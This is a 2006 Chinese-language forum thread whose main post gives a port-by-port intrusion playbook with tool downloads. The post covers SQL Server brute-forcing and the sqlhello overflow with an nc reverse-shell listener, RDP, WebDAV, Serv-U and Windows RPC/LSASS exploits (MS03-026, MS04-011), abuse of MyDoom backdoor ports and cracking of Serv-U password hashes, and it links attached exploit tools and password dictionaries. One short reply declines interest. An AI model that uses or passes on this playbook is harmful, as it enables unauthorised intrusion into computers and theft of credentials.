誮訫靉 发表于 2006-5-1 06:49:00

目前最实用的入侵方法以及工具下载

<span class="ContentFont"><font id="font_word" style="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif;">&nbsp; <div class="postcolor">1. 1433端口入侵<br/>scanport.exe 查有1433的机器<br/>SQLScanPass.exe 进行字典暴破(字典是关键)<br/>最后 SQLTools.exe入侵<br/>=============================<br/>对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。<br/>nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口<br/>(以上反向的,测试成功)<br/>sqlhelloz.exe 入侵ip 1433 (这个是正向连接)<br/><br/>2. 4899端口入侵<br/>用4899过滤器.exe,扫描空口令的机器<br/><br/>3. 3899的入侵<br/>对很早的机器,可以试试3389的溢出(win3389ex.exe)<br/>对2000的机器,可以试试字典暴破。(tscrack.exe)<br/><br/>4. 80入侵<br/>对sp3以前的机器,可以用webdav入侵;<br/>对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)<br/>可以利用SQL进行注入。(小榕的注入<a class="wordstyle" href="http://www.hackvip.com/" target="_blank"><font color="#ffffff">软件</font></a>)。<br/><br/>5. serv-u入侵(21端口)<br/>对5. 004及以下系统,可用溢出入侵。(serv5004.exe)<br/>对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)<br/>======================================<br/>对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)<br/>输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A<br/><br/>6. 554端口<br/>用real554.exe入侵。<br/><br/>7. 6129端口<br/>用DameWare6129.exe入侵。<br/><br/>8. 系统漏洞<br/>利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,<br/>进行溢出入侵。<br/><br/>9. 3127等端口<br/>可以利用doom<a class="wordstyle" href="http://www.hackvip.com/" target="_blank"><font color="#ffffff">病毒</font></a>开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。<br/><br/>10. 其他入侵<br/>利用shanlu的入侵<a class="wordstyle" href="http://www.hackvip.com/" target="_blank"><font color="#ffffff">软件</font></a>入侵(WINNTAutoAttack.exe)。<br/><br/><br/>顺便附上常用的一些字典。 <br/><br/><b><span class="edit">附加文件</span></b><br/><a title="下载附件" href="http://friend.91eb.com/index.php?act=Attach&amp;type=post&amp;id=78" target="_blank"><img alt="附加文件" src="http://friend.91eb.com/style_images/2/folder_mime_types/zip.gif"/></a> &nbsp;<a title="下载附件" href="http://friend.91eb.com/index.php?act=Attach&amp;type=post&amp;id=78" target="_blank"><font color="#c6c3c6">sql.rar</font></a> ( 1.03Mb ) <br/><a title="下载附件" href="http://friend.91eb.com/index.php?act=Attach&amp;type=post&amp;id=79" target="_blank"><img alt="附加文件" src="http://friend.91eb.com/style_images/2/folder_mime_types/zip.gif"/></a> &nbsp;<a title="下载附件" href="http://friend.91eb.com/index.php?act=Attach&amp;type=post&amp;id=79" target="_blank"><font color="#c6c3c6">sqlhello.rar</font></a> ( 33.61Kb ) </div><div class="postcolor"><a title="下载附件" href="http://friend.91eb.com/index.php?act=Attach&amp;type=post&amp;id=80" target="_blank"><img alt="附加文件" src="http://friend.91eb.com/style_images/2/folder_mime_types/zip.gif"/></a> &nbsp;<a title="下载附件" href="http://friend.91eb.com/index.php?act=Attach&amp;type=post&amp;id=80" target="_blank"><font color="#c6c3c6">4899过滤器.rar</font></a> ( 164.44Kb )<br/><a title="下载附件" href="http://friend.91eb.com/index.php?act=Attach&amp;type=post&amp;id=81" target="_blank"><img alt="附加文件" src="http://friend.91eb.com/style_images/2/folder_mime_types/zip.gif"/></a> &nbsp;<a title="下载附件" href="http://friend.91eb.com/index.php?act=Attach&amp;type=post&amp;id=81" target="_blank"><font color="#c6c3c6">win3389ex.rar</font></a> ( 21.58Kb ) <br/><a title="下载附件" href="http://friend.91eb.com/index.php?act=Attach&amp;type=post&amp;id=82" target="_blank"><img alt="附加文件" src="http://friend.91eb.com/style_images/2/folder_mime_types/zip.gif"/></a> &nbsp;<a title="下载附件" href="http://friend.91eb.com/index.php?act=Attach&amp;type=post&amp;id=82" target="_blank"><font color="#c6c3c6">200407103389pj.zip</font></a> ( 4.52Mb ) <br/><a title="下载附件" href="http://friend.91eb.com/index.php?act=Attach&amp;type=post&amp;id=83" targ

Jcomics 发表于 2006-5-8 12:37:00

我不是黑客~ 不玩这个~
页: [1]
查看完整版本: 目前最实用的入侵方法以及工具下载